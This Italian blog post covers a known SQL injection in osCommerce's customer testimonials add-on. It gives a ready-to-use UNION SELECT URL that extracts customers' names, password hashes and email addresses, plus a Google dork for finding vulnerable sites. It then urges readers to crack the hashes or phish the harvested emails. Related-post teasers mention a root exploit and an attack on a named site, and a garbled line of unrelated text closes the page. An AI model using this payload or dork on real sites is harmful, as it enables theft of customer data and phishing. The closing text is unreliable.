weBlog
news
osCommerce customers testimonials Sql injection
Di solito non segnalo bug già noti. Ma osCommerce è un CMS di vendita online ed un SQL inject su questo CMS permette di accedere ai dati degli utenti registrati su un determinato sito. La segnalazione del bug è su milw0rm
L’exploit consiste nell’iniettare una query sql tramite $_GET
http://www.vuln.oscommerce.com/customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8+from+customers/*
Per trovare siti con installato l’addon buggato di osCommerce basta cercare su google il dork: inurl:”customer_testimonials.php”
Poi sta a voi giocare con gli md5 o fare un po’ di fishing con gli indirizzi email che riuscirete a scovare.
Argomenti correlati:
- Linux vmsplice Local Root Exploit Nei kernel distribuiti da Debian ed Ubuntu è stata individuata e confermata una vulnerabilità che garantisce ad un utente locale la possibilità di diventare root, eseguendo semplicemente questo...
- SQL injection - Un esempio pratico: studentidemocratici.it vulnerabile Dopo un simpatico battibecco sul forum di studentidemocratici con tote_bari, mi era venuto un pruritino alle dita... una voglia di scherzetto! comincio a spulciare un po il phpBB ma risulta tutto...
height. a young else my dad with my still there. When my misguided had and we and dream.